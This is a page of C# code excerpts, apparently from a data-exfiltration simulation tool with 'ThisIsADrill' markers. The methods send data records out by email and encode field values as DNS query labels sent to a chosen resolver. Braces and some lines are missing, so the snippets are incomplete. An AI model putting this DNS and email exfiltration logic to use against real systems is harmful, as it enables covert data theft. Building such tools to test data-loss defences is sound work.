Esempio n. 1
        public int SendDecrementalEmails(DataRecordCollection data, string destination)
            int sent          = 0;
            int current_chunk = data.GetShape().Rows;

            while (sent < data.GetShape().Rows)
                current_chunk /= 2;
                if (current_chunk == 0)
                    ++current_chunk;    //we need at least one more record if its here and the chunk size is zero
                int records_to_send = 0;
                if (sent + current_chunk >= data.GetShape().Rows)
                    records_to_send = data.GetShape().Rows - sent;
                    records_to_send = current_chunk;
                DataRecordCollection drc = new DataRecordCollection(data.Schema);
                foreach (DataRecord d in data.GetRecords().Skip(sent).Take(records_to_send))
                SendAllRecords(drc, destination);
                sent += records_to_send;
Esempio n. 2
        public int Send(DataRecordCollection data, string destination)
            int sent = 0;

            foreach (DataRecord d in data.GetRecords())
                string sending_body = email_body + d.ToString();
                SendMailItem(destination, sending_body);
Esempio n. 3
        /// <summary>
        ///this will perform a sequence of DNS querys, which are roughly equivalent to doing the following:
        ///  GetHostEntry("")
        ///  GetHostEntry("[val1].[key1].[rec1]")
        ///  GetHostEntry("[val2].[key2].[rec2]")
        ///  GetHostEntry("[val3].[key3].[rec3]")
        ///  GetHostEntry("[val-n].[key-n].[rec-n]")
        ///  GetHostEntry("")
        ///  where 'n' is the number of key value pairs in a record.
        ///  It will repeat this pattern for every piece of exfiltrated data.
        ///  --
        ///  for eaxmple:
        ///      a DataRecordCollection object with a Shape of 100,5 (that means 100 records, and schema lenght of 5)
        ///      will make a total of 100x5+2=502 dns queryies to the target.
        ///  So. in general, it will send a total number of DNS requests equal to:
        ///     records.Shape.Rows x records.Shape.Columns + 2
        ///  It will not wait nor care about the response.
        /// </summary>
        /// <param name="records">the DataRecordCollection object to exfiltrate</param>
        /// <param name="target_domain">DNS domain to target.  If default, the query will be sent to 'localhost.local'</param>
        /// /// <param name="base64encode">base 64 encode the values.  default is false</param>
        public int Send(DataRecordCollection data, string custom_name_resolver)
            IPAddress t;

            custom_name_resolver = (!IPAddress.TryParse(custom_name_resolver, out t))   //check if we have been supplied an ip.  if so, continue, if not then translate the host name to an ip
                ? DnsUtils.GetIPFromName(custom_name_resolver)
                : custom_name_resolver;

            int    items_sent = 0;
            bool   async_mode = ((ops & Options.ASYNCHRONOUS_MODE) != 0);
            string query;

            string[] keys = data.GetSchema();
            foreach (object o in data.GetRecords()) //iterate through each record in the records list
                if (o == null)
                DataRecord dr   = (DataRecord)o;
                string[]   vals = dr.Data;
                query = "ThisIsADrill.ThisIsADrill.ThisIsADrill." + host_suffix;
                DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode);
                for (int i = 0; i < keys.Length; i++)
                    String   key       = keys[i];
                    String   val       = vals[i];
                    String   recNumber = "rec" + RecordsSent.ToString();
                    String[] labels    = new String[] { val, key, recNumber, SAFETY_WORD + host_suffix };
                    labels = DnsUtils.MakeLabelsDNSCompliant(labels);
                    query  = String.Join(".", labels.ToList());
                    DnsUtils.SendDnsQuery(query, custom_name_resolver, async_mode);
                DnsUtils.SendDnsQuery("ThisIsADrill.ThisIsADrill.ThisIsADrill" + host_suffix, custom_name_resolver, async_mode);
Esempio n. 4
        public int Send(DataRecordCollection data, string destination)
            int sent = 0;

            foreach (DataRecord d in data.GetRecords())
                if (d == null)
                var fromAddress = new MailAddress(email_from, email_from.Split('@')[0]);
                var toAddress   = new MailAddress(destination, destination.Split('@')[0]);

                string email_body = d.ToString();

                var smtp = new SmtpClient
                    Host                  = server,
                    Port                  = Port,
                    EnableSsl             = ssl,
                    DeliveryMethod        = SmtpDeliveryMethod.Network,
                    UseDefaultCredentials = false,
                    Credentials           = new NetworkCredential(fromAddress.Address, password)
                using (var msg = new MailMessage(fromAddress, toAddress)
                    Subject = subject_line,
                    Body = this.body + "\n" + email_body